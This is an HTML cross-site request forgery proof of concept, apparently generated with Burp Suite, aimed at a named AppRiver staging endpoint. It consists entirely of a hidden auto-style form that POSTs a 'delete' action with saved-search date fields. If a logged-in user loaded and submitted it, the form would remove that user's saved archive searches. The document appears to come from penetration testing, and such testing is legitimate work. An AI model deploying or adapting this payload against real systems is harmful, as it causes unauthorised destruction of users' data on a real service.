<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://cpstaging.appriver.com/ngp/archiving/saved/saved_ajax.php?action=delete" method="POST">
      <input type="hidden" name="fq" value="" />
      <input type="hidden" name="next&#95;h&#95;saved" value="2" />
      <input type="hidden" name="end&#95;h&#95;saved" value="2" />
      <input type="hidden" name="date&#95;from&#95;254948" value="Dec&#32;1&#44;&#32;2021" />
      <input type="hidden" name="date&#95;to&#95;254948" value="Apr&#32;26&#44;&#32;2022" />
      <input type="hidden" name="date&#95;from&#95;254946" value="Dec&#32;1&#44;&#32;2021" />
      <input type="hidden" name="date&#95;to&#95;254946" value="Apr&#32;26&#44;&#32;2022" />
      <input type="hidden" name="date&#95;from&#95;254944" value="Jan&#32;1&#44;&#32;2022" />
      <input type="hidden" name="date&#95;to&#95;254944" value="Apr&#32;25&#44;&#32;2022" />
      <input type="hidden" name="date&#95;from&#95;254942" value="Jan&#32;1&#44;&#32;2022" />
      <input type="hidden" name="date&#95;to&#95;254942" value="Apr&#32;25&#44;&#32;2022" />
      <input type="hidden" name="date&#95;from&#95;254936" value="Jul&#32;1&#44;&#32;2021" />
      <input type="hidden" name="date&#95;to&#95;254936" value="Apr&#32;25&#44;&#32;2022" />
      <input type="hidden" name="date&#95;from&#95;254934" value="Jul&#32;1&#44;&#32;2021" />
      <input type="hidden" name="date&#95;to&#95;254934" value="Apr&#32;25&#44;&#32;2022" />
      <input type="hidden" name="date&#95;from&#95;254932" value="Jul&#32;1&#44;&#32;2021" />
      <input type="hidden" name="date&#95;to&#95;254932" value="Apr&#32;25&#44;&#32;2022" />
      <input type="hidden" name="date&#95;from&#95;254930" value="Jul&#32;1&#44;&#32;2021" />
      <input type="hidden" name="date&#95;to&#95;254930" value="Apr&#32;25&#44;&#32;2022" />
      <input type="hidden" name="date&#95;from&#95;254926" value="Jul&#32;1&#44;&#32;2021" />
      <input type="hidden" name="date&#95;to&#95;254926" value="Apr&#32;25&#44;&#32;2022" />
      <input type="hidden" name="frm&#95;grp&#91;254918&#93;" value="sss" />
      <input type="hidden" name="date&#95;from&#95;254918" value="Feb&#32;1&#44;&#32;2022" />
      <input type="hidden" name="date&#95;to&#95;254918" value="Apr&#32;25&#44;&#32;2022" />
      <input type="hidden" name="next&#95;h&#95;saved" value="2" />
      <input type="hidden" name="end&#95;h&#95;saved" value="2" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
